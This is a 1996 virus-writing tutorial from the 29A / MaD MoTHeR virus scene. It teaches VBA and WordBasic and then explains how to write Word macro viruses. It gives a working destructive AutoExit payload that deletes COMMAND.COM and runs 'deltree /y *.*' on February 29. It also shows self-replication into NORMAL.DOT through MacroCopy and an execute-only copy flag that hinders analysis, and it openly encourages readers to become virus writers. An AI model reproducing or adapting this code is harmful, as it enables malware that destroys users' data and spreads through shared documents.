@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ VBA VIRUSES AND TROJANS @ @ by @ @ Leugim San/29A @ @ & @ @ MaD MoTHeR @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@ (@) MaD MoTHeR TeaM - 1996 A macro is a program written in a certain language which is used usually for automatizing some processes inside an application. In this case, we will talk about Visual Basic for Applications (VBA) and WordBasic (WB), which are the languages used by Microsoft and all their programs; thus, Excel, Project and PowerPoint use VBA, and WinWord uses WB. From now we will speak about VBA as a general language, because it's the attempt to unify a macro language, common for all the Microsoft programs. Anyway, WordBasic has still some characteristics which make that, someti- mes, we reffer specifically to it. There are some differences between the syntax of these two languages, but the coding structure is the same, so, if we don't make any specification, we'll speak about VBA, as the common Microsoft macro language. The VBA macros are called procedures; there are two kinds of procedures: - Sub procedures - Function procedures The sub procedures may be executed directly or being called from other macro. The syntax for these procedures is the following: Sub -> write here the macro code <- ' the comments are preceded by an apostrophe End Sub Example: Sub Stupid_Greeting ' This macro opens a dialog box and displays a message MsgBox "Hello World!" End Sub The function procedures (aka functions) return a value, which may be pa- ssed as a parameter for other VBA procedure. This is its syntax: Function (arguments) -> Instructions <- ' Commentaries End Function Example: Function AddAB(a,b) ' This adds the parameters a and b and returns the result ' in "AddAB" AddAB = a+b End Function Of course, you can insert in a document as many macros as you need or want, there's no limit. Now that you've understood what a joint of macros is, we'll call it VBA module. This means that a VBA module is a joint of macros (sub and function procedures) which make up an Office document. The VBA language also works with objects; we can make references to other documents, graphics... inside the VBA modules. Objects have properties. For instance, the background color of an object is a property (aka attri- bute). Objects also have 'methods', which are the operations we can make with them (with the objects). VBA allows us to work with variables, and, as a structured programming language, it has the typical constructions of other languages: þ 'For-next' bucles: Sub Counter Infect_Num=0 For Count=1 to 10 Infect_Num=Infect_Num+Count Next Count MsgBox "I reached the maximum infection number" End Sub þ 'If-then' conditions: Sub Infect_Check If Infect_Num=0 Then MsgBox "File not infected" End Sub þ 'With-end with' constructions (used for working with several pro- perties of a certain object): Sub ChangeProperties With Selection .Font.Bold=True .Font.ColorIndex=3 ' Red color End With End Sub þ 'Select case-end select' constructions: Sub Check_Infection Select Case Infect_Num Case 0 MsgBox "File not infected" Case is > 0 MsgBox "File infected" Case is < 0 Infect_Num=0 End Case End Sub A very useful tool for working with the VBA language is the debuggin win- dow. With it we can trace code, make corrections, and so on... one debug- ging technique consists on using flags for halting for a moment the code execution with a MsgBox after each instruction, so we can analyze the contents of certain variables and/or instructions (albeit the VBA debug- ger is able to set break points for halting the code execution, too). Something very important, apart of this, are the arguments of a function procedure; as we've just seen, the structure of a VBA procedure is this: Function (arguments) [...] End Function These arguments may be constants, variables, or expressions. Anway, there are procedures which don't need any arguments: Function Get_Name() Name=Application.UserName End Function There are function procedures which always have a fixed argument number (up to 60). Other functions have some fixed arguments and other optional. Ok, and once the basics of VBA are clear for everybody, we can start learning something about the thing we're about to study: VBA viruses and trojans :-) The VBA language is very versatile, and this is basically due to two rea- sons: the first of them is its big facility of learning and use; as it's a high level language orientated to events (not to objects :) it's very easy to create complex modules without spending many time on it. The se- cond reason is the extra large number of predefined functions it has, which make things much easier for us. We could even say a third reason, but it's really included in the previous one... and it's that we can use functions (or macros) of *automatic_execution*, so we can simulate some thingies which make eeeeven easier to write routines as autocopying, me- mory residency, etc), used by the 'normal' DOS viruses. Besides this, VBA has, as an exclusive feature, the PORTABILITY property, advantage, or however you wanna call it. VBA worxor under Windows 3.x, Windows95, WindowsNT, Macintosh, etc. this is: in every enviroment or OS in which we can run any version of the applications which support VBA. But don't expect so many facilities... :-) VBA is a language which adapts to the language of the application under it's running. This means that, if we have the spanish version of WinWord, the names of the predefined functions will be in spanish, so the two next macros will NOT be the same (the first one is written in spanish, and the second one, in english): þ First macro (spanish): Sub Demo_Macro Con Selecci¢n.Fuente .Nombre="Arial" Fin Con End Sub þ Second macro (english): Sub Demo_Macro With Selection.Font .Name="Arial" End With End Sub This last macro would NOT work under our spanish version of WinWord... it would force a macro execution error, so it wouldn't do anything. And re- member that VBA is an interpreted language (not compiled) so every execu- tion error appears 'on the fly'. But... doesn't this have any solution? ... ... ... ... }:-) ... Sure! ;-) There are some functions, common to all the VBA versions, without depen- ding on the language. For instance... the automatic macro AutoExec (which is executed when loading WinWord if it's stored in a template called NOR- MAL.DOT) would work under every VBA version. Maybe one of the first exercises we should do would be trying to write a multiplatform and multilanguage virus... but maybe it already exists... }:-) hehe... but let's go on with the tutorial. The next step, once we've analyzed the language syntax, we have to study the functions we need to use in our viruses. As this ain't a text about programming in general but a macro virus tutorial, we'll focus our atten- tion to the automatic macros used by WinWord, implemented in WordBasic (but note: NOT in VBA). There are five special macros which execute automatically and which we'll have to care about: þ AutoExec: it's a macro which activates when loading the text processor, but only when it's stored in the template NORMAL.DOT or in the default application directory þ AutoNew: it activates when creating a new document þ AutoOpen: it activates when opening an existing document þ AutoClose: it activates when closing a document þ AutoExit: it activates when exiting the text processor For proving the potence and the versatility of these macros, we can have a look at the following code (by now we won't care about the language): ' Save this macro as AutoExit Sub Main If Application.Username <> "MaD_MoTHeR" Then ' We check the registration name of the application SetAttr "C:\COMMAND.COM",0 ' Wipe the attributes of COMMAND.COM Open "C:\COMMAND.COM" for Output as #1 ' We open it for checking if it activates any error flag Close #1 ' It exists, ok... let's close it... Kill "C:\COMMAND.COM" ' ... and kill it }:-) End If If Month(Now())=2 Then ' System date -> month=february (2)? If Day(Now())=29 Then ' february 29th? (only one time each four years) :-) Shell "deltree /y *.* > null" ' Btw... /y works for all the languages :-) End If End If End Sub The macro above will check two things on exiting from WinWord: if the re- gistration name is equal to MaD_MoTHeR, it will delete COMMAND.COM; and if the system date is equal to february 29th (only for leap years) :-) it will do a deltree /y *.* > null, and i guess you all know what does this DOS command do, right? };-) Ok, now you're supposed to have a big enough knowledge to face the next and last chapter of this tutorial: replication. It's the most important thing for writing viruses, don't you think? :-) The unique thing we must know is how can we adapt an automatic macro (this is the simplest example) in order to install it in the template which is opened by default by WinWord. This is done by following the next steps... first, define a variable which stores the complete macro name: name$ = WindowName$() + ":AutoNew" ' This macro will be executed ' every time a new document is ' created And then, all our work is to write it into the template NORMAL.DOT with this simple instruction: MacroCopy name$, "Global:AutoNew" Quite easy, isn't it? :-) Anyway, this is the general way in which macro viruses work, but there are lots of cooler ways to infect... all it takes is a little bit of imagination and additional code. One of these things which make your viruses cooler and difficult their analysis is the macro encryption... and it's easier than the replication!!! :-) MacroCopy "MyTemplate:MyMacro", "Global:AutoClose", 1 If you execute the MacroCopy function passing 1 (or any other number un- less 0) as parameter, the result of the copy will be an only executable macro, so we won't be able to edit it! :-) And this is all you need for becoming a macro virus writer... practice, research, and try to write something really original. Btw, there's a vi- rus sample i wrote included in '29A virii'. It's a supertiny and super- simple macro infector which contains a little payload :-) Don't forget to have a look at it! (@) MaD MoTHeR TeaM - 1996